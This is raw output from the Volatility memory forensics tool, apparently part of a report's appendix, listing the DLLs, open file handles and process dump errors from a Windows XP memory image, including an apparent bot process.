0x760f0000 0x78000 C:\WINDOWS\system32\urlmon.dll 0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll 0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\COMCTL32.dll 0x76f50000 0x8000 C:\WINDOWS\System32\WTSAPI32.dll 0x76360000 0xf000 C:\WINDOWS\System32\WINSTA.dll 0x76200000 0x97000 C:\WINDOWS\system32\WININET.dll 0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll 0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll 0x5ad70000 0x34000 C:\WINDOWS\system32\uxtheme.dll 0x74e30000 0x6b000 C:\WINDOWS\System32\RICHED20.dll 0x76fd0000 0x78000 C:\WINDOWS\System32\CLBCATQ.DLL 0x77050000 0xc5000 C:\WINDOWS\System32\COMRes.dll 0x75e90000 0xa1000 C:\WINDOWS\System32\SXS.DLL 0x76f90000 0x10000 C:\WINDOWS\System32\Secur32.dll 0x76ee0000 0x37000 C:\WINDOWS\System32\RASAPI32.DLL 0x76e90000 0x11000 C:\WINDOWS\System32\rasman.dll 0x71ab0000 0x15000 C:\WINDOWS\System32\WS2_32.dll 0x71aa0000 0x8000 C:\WINDOWS\System32\WS2HELP.dll 0x71c20000 0x4f000 C:\WINDOWS\System32\NETAPI32.dll 0x76eb0000 0x2a000 C:\WINDOWS\System32\TAPI32.dll 0x76e80000 0xd000 C:\WINDOWS\System32\rtutils.dll 0x76b40000 0x2c000 C:\WINDOWS\System32\WINMM.dll 0x722b0000 0x5000 C:\WINDOWS\System32\sensapi.dll 0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll 0x76d40000 0x16000 C:\WINDOWS\System32\MPRAPI.dll 0x76e40000 0x2f000 C:\WINDOWS\System32\ACTIVEDS.dll 0x76e10000 0x24000 C:\WINDOWS\System32\adsldpc.dll 0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll 0x76b20000 0x15000 C:\WINDOWS\System32\ATL.DLL 0x71bf0000 0x11000 C:\WINDOWS\System32\SAMLIB.dll 0x76670000 0xe4000 C:\WINDOWS\System32\SETUPAPI.dll

************************************************************************ rhul_bot.releas pid: 452 Unable to read PEB for task. ************************************************************************ Nigilant32.exe pid: 816 Unable to read PEB for task. bash-3.2$ python volatility files -f ../memory.img ************************************************************************ Pid: 4 File \Documents and Settings\NetworkService\ntuser.dat.LOG File \WINDOWS\system32\config\system.LOG File \WINDOWS\system32\config\SAM.LOG File \WINDOWS\system32\config\default.LOG File \WINDOWS\system32\config\default File \WINDOWS\system32\config\system File \WINDOWS\system32\config\software.LOG File \WINDOWS\system32\config\software File \WINDOWS\system32\config\SECURITY File \WINDOWS\system32\config\SECURITY.LOG File \pagefile.sys File \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat File \Documents and Settings\NetworkService\NTUSER.DAT File \WINDOWS\system32\config\SAM File \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG File \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat File \Documents and Settings\LocalService\ntuser.dat.LOG File \Documents and Settings\LocalService\NTUSER.DAT File \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG File \255 File \ File \Documents and Settings\steve\NTUSER.DAT File \Documents and Settings\steve\ntuser.dat.LOG File \Documents and Settings\steve\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat 114

File \Documents and Settings\steve\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG ************************************************************************ Pid: 800 File \WINDOWS File \WINDOWS\system32 ************************************************************************ Pid: 888 File \WINDOWS\system32 ************************************************************************ Pid: 912 File \TerminalServer\AutoReconnect File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \InitShutdown File \InitShutdown File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\AppPatch File \WINDOWS\system32\dllcache File \Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm File \Program Files\Common Files\Microsoft Shared\web server extensions\40\_vti_bin\_vti_adm File \WINDOWS\system32 File \Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut File \Program Files\Common Files\Microsoft Shared\web server extensions\40\_vti_bin\_vti_aut File \WINDOWS\system32\inetsrv File \Program Files\Common Files\Microsoft Shared\web server extensions\40\bin File \WINDOWS\Fonts File \WINDOWS\system32\drivers File \Program Files\Common Files\Microsoft Shared\web server extensions\40\servsupp File \Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar File \Program Files\microsoft frontpage\version3.0\bin File \Program Files\Common Files\Microsoft Shared\web server extensions\40\_vti_bin File \Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\1033 File \Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi File \WINDOWS File \Program Files\Common Files\Microsoft Shared\DAO File \Program Files\Windows Media Player File \Program Files\Common Files\System\msadc File \Program Files\Common Files\System\ado File \Program Files\Common Files\System\Ole DB File \WINDOWS\inf File \WINDOWS\system File \WINDOWS\msagent File \WINDOWS\msagent\intl File \Program Files\MSN Gaming Zone\Windows File \WINDOWS\Help File \WINDOWS\PCHEALTH\HELPCTR\Binaries File \Program Files\NetMeeting File \WINDOWS\system32\drivers\disdn File \WINDOWS\ime\CHTIME\Applets File \WINDOWS\system32\wbem File \WINDOWS\system32\IME\CINTLGNT File \WINDOWS\system32\Com File \WINDOWS\system32\Setup File \WINDOWS\ime\imjp8_1 File \Program Files\Common Files\Microsoft Shared\Triedit File \Program Files\Windows NT File \Program Files\Common Files\System File \WINDOWS\system32\1033 File \Program Files\Common Files\Microsoft Shared\web server extensions\40\admcgi\scripts File \Program Files\Common Files\Microsoft Shared\web server 115

extensions\40\admisapi\scripts File \WINDOWS\system32\usmt File \WINDOWS\ime\imkr6_1\dicts File \WINDOWS\system32\mui\0009 File \Program Files\Internet Explorer File \WINDOWS\ime\imjp8_1\applets File \WINDOWS\ime\imkr6_1\applets File \WINDOWS\system32\xircom File \Program Files\Internet Explorer\Connection Wizard File \Program Files\Common Files\Microsoft Shared\MSInfo File \WINDOWS\ime\imkr6_1 File \WINDOWS\ime\shared File \WINDOWS\system32\IME\PINTLGNT File \Program Files\Common Files\SpeechEngines\Microsoft\Lexicon\1033 File \WINDOWS\Resources\Themes\Luna File \Program Files\Movie Maker File \WINDOWS\ime File \WINDOWS\srchasst File \Program Files\Outlook Express File \WINDOWS\system32\oobe File \Program Files\Common Files\MSSoap\Binaries File \Program Files\Common Files\MSSoap\Binaries\Resources\1033 File \WINDOWS\mui File \WINDOWS\system32\npp File \WINDOWS\ime\shared\res File \Program Files\Windows NT\Pinball File \WINDOWS\ime\chsime\applets File \WINDOWS\system32\Restore File \Program Files\Common Files\SpeechEngines\Microsoft\TTS\1033 File \Program Files\Common Files\Microsoft Shared\Speech File \WINDOWS\Resources\Themes\Luna\Shell\NormalColor File \WINDOWS\Resources\Themes\Luna\Shell\Homestead File \WINDOWS\Resources\Themes\Luna\Shell\Metallic File \WINDOWS\system32\wbem\snmp File \Program Files\Common Files\SpeechEngines\Microsoft File \Program Files\Common Files\Microsoft Shared\Speech\1033 File \WINDOWS\system32\spool\drivers\color File \WINDOWS\system32\Macromed\Flash File \WINDOWS\system32\IME\TINTLGNT File \WINDOWS\Help\Tours\mmTour File \WINDOWS\PCHEALTH\UploadLB\Binaries File \Program Files\Common Files\Microsoft Shared\VGX File \WINDOWS\system32\wbem\xml File \Program Files\Windows NT\Accessories File \Program Files\xerox\nwwia File \WINDOWS\WinSxS File \SfcApi File \SfcApi File \ntsvcs File \ProfMapApi File \ProfMapApi File \winlogonrpc File \winlogonrpc File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File sgsvc File \AudioSrv File \WINDOWS\system32 ************************************************************************ Pid: 956 File \WINDOWS\system32 File \ntsvcs File \ntsvcs File \scerpc File \scerpc File \svcctl File \net\NtControlPipe1 File \net\NtControlPipe1 File \net\NtControlPipe2 File \WINDOWS\system32\config\ACS.evt File \WINDOWS\system32\config\AppEvent.Evt 116

File \WINDOWS\system32\config\SecEvent.Evt File \WINDOWS\system32\config\SysEvent.Evt File \ntsvcs File \net\NtControlPipe3 File \ntsvcs File \net\NtControlPipe0 File \ntsvcs File \PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER File \ntsvcs File \net\NtControlPipe4 File \ntsvcs File \net\NtControlPipe5 File \ntsvcs File \ntsvcs File \ntsvcs File \net\NtControlPipe6 File \ntsvcs File \ntsvcs File \net\NtControlPipe7 File \ntsvcs File \ntsvcs File \ntsvcs File \ntsvcs File \ntsvcs File \ntsvcs File \ntsvcs File \ntsvcs File \ntsvcs File \ntsvcs File \ntsvcs File \ntsvcs File \ntsvcs File \ntsvcs File \ntsvcs ************************************************************************ Pid: 968 File \WINDOWS\system32 File \net\NtControlPipe0 File \WINDOWS\Debug\PASSWD.LOG File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \protected_storage File \protected_storage File \lsass File \lsass File \lsass File \uccd8\ue194sass File \WINDOWS\Debug\oakley.log File \svcctl File \Endpoint File \Endpoint File \Endpoint File \255 File \ipsec File \ipsec File \lsass ************************************************************************ Pid: 1148 File \WINDOWS\system32 File \net\NtControlPipe2 File \Endpoint File \Endpoint File \Winsock2\CatalogChangeListener-47c-0 File \Endpoint File \Endpoint File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a 117

File \Endpoint File \epmapper File \epmapper File \svcctl File \Endpoint ************************************************************************ Pid: 1276 File \WINDOWS\system32 File \net\NtControlPipe3 File \svcctl File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \DhcpClient File \Endpoint File \Endpoint File \ntsvcs File \Ctx_WinStation_API_service File \Ctx_WinStation_API_service File \svcctl File \WINDOWS\SchedLgU.Txt File \Endpoint File \Winsock2\CatalogChangeListener-4fc-0 File \atsvc File \atsvc File \Endpoint File \WINDOWS\Tasks File \AudioSrv File \AudioSrv File \wkssvc File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \svcctl File \svcctl File \Endpoint File \svcctl File \WINDOWS\system32\wbem\mof File \SECLOGON File \SECLOGON File \svcctl File \svcctl File \svcctl File \svcctl File \W32TIME File \W32TIME File \svcctl File \svcctl File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \svcctl File \PCHHangRepExecPipe File \PCHFaultRepExecPipe File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \wkssvc File \AudioSrv File \WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat File \wkssvc ************************************************************************ Pid: 1568 File \WINDOWS\system32 File \net\NtControlPipe4 File \svcctl File \WINDOWS\system32\drivers\etc File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- 118

Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \Endpoint ************************************************************************ Pid: 1592 File \WINDOWS\system32 File \net\NtControlPipe5 File \svcctl File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat File \Documents and Settings\LocalService\Cookies\index.dat File \Documents and Settings\LocalService\Local Settings\History\History.IE5\index.dat File \DAV RPC SERVICE File \DAV RPC SERVICE File \winreg File \winreg File \Endpoint File \ssdpsrv File \ssdpsrv File \Endpoint File \Endpoint File \AsyncSelectHlp File \DAV RPC SERVICE ************************************************************************ Pid: 1788 File \WINDOWS\system32 File \net\NtControlPipe6 File \svcctl File \spoolss File \spoolss File \ntsvcs File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a ************************************************************************ Pid: 1960 File \WINDOWS\system32 File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \net\NtControlPipe7 File \svcctl File \ntsvcs ************************************************************************ Pid: 1656 File \Documents and Settings\steve File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \Documents and Settings\steve\Desktop 119

File \Documents and Settings\All Users\Desktop File \Documents and Settings\steve\Local Settings\Application Data\Microsoft\CD Burning File \ntsvcs File \Documents and Settings\All Users\Start Menu File \Documents and Settings\steve\Start Menu File \Documents and Settings\steve\NetHood File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \Documents and Settings\steve\PrintHood File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \Documents and Settings\steve\Local Settings\Temporary Internet Files\Content.IE5\index.dat File \Documents and Settings\steve\Cookies\index.dat File \Documents and Settings\steve\Local Settings\History\History.IE5\index.dat File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \u0b08\ue106amr File \AudioSrv File \u3b10\ue196sarpc File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a ************************************************************************ Pid: 792 File \Documents and Settings\steve File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \Program Files\Messenger\msmsgs.exe File \Program Files\Messenger\msmsgs.exe File \WINDOWS\system32\stdole32.tlb File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \Documents and Settings\steve\Local Settings\Temporary Internet Files\Content.IE5\index.dat File \Documents and Settings\steve\Cookies\index.dat File \Documents and Settings\steve\Local Settings\History\History.IE5\index.dat ************************************************************************ Pid: 484 File \WINDOWS\system32 File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a File \WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat File \WINDOWS\system32\config\systemprofile\Cookies\index.dat File \WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a 120

************************************************************************ Pid: 452 ************************************************************************ Pid: 816 bash-3.2$ python volatility procdump -f ../memory.img ************************************************************************ Error: Image base not memory resident for process [4] ************************************************************************ Dumping smss.exe, pid: 800 output: executable.800.exe Memory Not Accessible: Virtual Address: 0x4858a000 File Offset: 0xa000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4858c000 File Offset: 0xc000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4858d000 File Offset: 0xd000 Size: 0x1000 ************************************************************************ Dumping csrss.exe, pid: 888 output: executable.888.exe Memory Not Accessible: Virtual Address: 0x4a682000 File Offset: 0x2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4a683000 File Offset: 0x3000 Size: 0x1000 ************************************************************************ Dumping winlogon.exe, pid: 912 output: executable.912.exe Memory Not Accessible: Virtual Address: 0x1002000 File Offset: 0x2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1003000 File Offset: 0x3000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1004000 File Offset: 0x4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1005000 File Offset: 0x5000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x100b000 File Offset: 0xb000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x100c000 File Offset: 0xc000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x100d000 File Offset: 0xd000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x100e000 File Offset: 0xe000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x100f000 File Offset: 0xf000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1013000 File Offset: 0x13000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1016000 File Offset: 0x16000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1017000 File Offset: 0x17000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1018000 File Offset: 0x18000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1019000 File Offset: 0x19000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x101a000 File Offset: 0x1a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x101e000 File Offset: 0x1e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1023000 File Offset: 0x23000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1024000 File Offset: 0x24000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1025000 File Offset: 0x25000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1028000 File Offset: 0x28000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1029000 File Offset: 0x29000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x102c000 File Offset: 0x2c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x102f000 File Offset: 0x2f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1032000 File Offset: 0x32000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1035000 File Offset: 0x35000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1036000 File Offset: 0x36000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1037000 File Offset: 0x37000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1038000 File Offset: 0x38000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1039000 File Offset: 0x39000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x103a000 File Offset: 0x3a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x103b000 File Offset: 0x3b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x103c000 File Offset: 0x3c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x103d000 File Offset: 0x3d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x103e000 File Offset: 0x3e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x103f000 File Offset: 0x3f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1040000 File Offset: 0x40000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1041000 File Offset: 0x41000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1042000 File Offset: 0x42000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1044000 File Offset: 0x44000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1045000 File Offset: 0x45000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1046000 File Offset: 0x46000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1047000 File Offset: 0x47000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1049000 File Offset: 0x49000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x104b000 File Offset: 0x4b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x104c000 File Offset: 0x4c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x104d000 File Offset: 0x4d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x104e000 File Offset: 0x4e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x104f000 File Offset: 0x4f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1050000 File Offset: 0x50000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1051000 File Offset: 0x51000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1052000 File Offset: 0x52000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1053000 File Offset: 0x53000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1054000 File Offset: 0x54000 Size: 0x1000 121

Memory Not Accessible: Virtual Address: 0x1055000 File Offset: 0x55000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1056000 File Offset: 0x56000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1057000 File Offset: 0x57000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1058000 File Offset: 0x58000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x105b000 File Offset: 0x5b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x105c000 File Offset: 0x5c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x105d000 File Offset: 0x5d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x105e000 File Offset: 0x5e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1062000 File Offset: 0x62000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1065000 File Offset: 0x65000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1066000 File Offset: 0x66000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1067000 File Offset: 0x67000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1068000 File Offset: 0x68000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1069000 File Offset: 0x69000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x106a000 File Offset: 0x6a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x106b000 File Offset: 0x6b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x106c000 File Offset: 0x6c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x106d000 File Offset: 0x6d000 Size: 0x1000 ************************************************************************ Dumping services.exe, pid: 956 output: executable.956.exe Memory Not Accessible: Virtual Address: 0x1011000 File Offset: 0x11000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1012000 File Offset: 0x12000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1014000 File Offset: 0x13000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1015000 File Offset: 0x14000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1017000 File Offset: 0x15000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1018000 File Offset: 0x16000 Size: 0x1000 ************************************************************************ Dumping lsass.exe, pid: 968 output: executable.968.exe Memory Not Accessible: Virtual Address: 0x1001000 File Offset: 0x1000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1002000 File Offset: 0x2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1003000 File Offset: 0x3000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1004000 File Offset: 0x4000 Size: 0x1000 ************************************************************************ Dumping svchost.exe, pid: 1148 output: executable.1148.exe Memory Not Accessible: Virtual Address: 0x1003000 File Offset: 0x3000 Size: 0x1000 ************************************************************************ Dumping svchost.exe, pid: 1276 output: executable.1276.exe Memory Not Accessible: Virtual Address: 0x1003000 File Offset: 0x3000 Size: 0x1000 ************************************************************************ Dumping svchost.exe, pid: 1568 output: executable.1568.exe Memory Not Accessible: Virtual Address: 0x1003000 File Offset: 0x3000 Size: 0x1000 ************************************************************************ Dumping svchost.exe, pid: 1592 output: executable.1592.exe Memory Not Accessible: Virtual Address: 0x1003000 File Offset: 0x3000 Size: 0x1000 ************************************************************************ Dumping spoolsv.exe, pid: 1788 output: executable.1788.exe Memory Not Accessible: Virtual Address: 0x1005000 File Offset: 0x5000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1006000 File Offset: 0x6000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1007000 File Offset: 0x7000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1008000 File Offset: 0x8000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x100b000 File Offset: 0xb000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x100d000 File Offset: 0xd000 Size: 0x1000 ************************************************************************ Dumping acs.exe, pid: 1960 output: executable.1960.exe Memory Not Accessible: Virtual Address: 0x402000 File Offset: 0x2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x407000 File Offset: 0x7000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x40a000 File Offset: 0xa000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x40b000 File Offset: 0xb000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x40d000 File Offset: 0xd000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x40e000 File Offset: 0xe000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x40f000 File Offset: 0xf000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x410000 File Offset: 0x10000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x411000 File Offset: 0x11000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x412000 File Offset: 0x12000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x413000 File Offset: 0x13000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x414000 File Offset: 0x14000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x415000 File Offset: 0x15000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x417000 File Offset: 0x17000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x418000 File Offset: 0x18000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x419000 File Offset: 0x19000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x41b000 File Offset: 0x1b000 Size: 0x1000 122

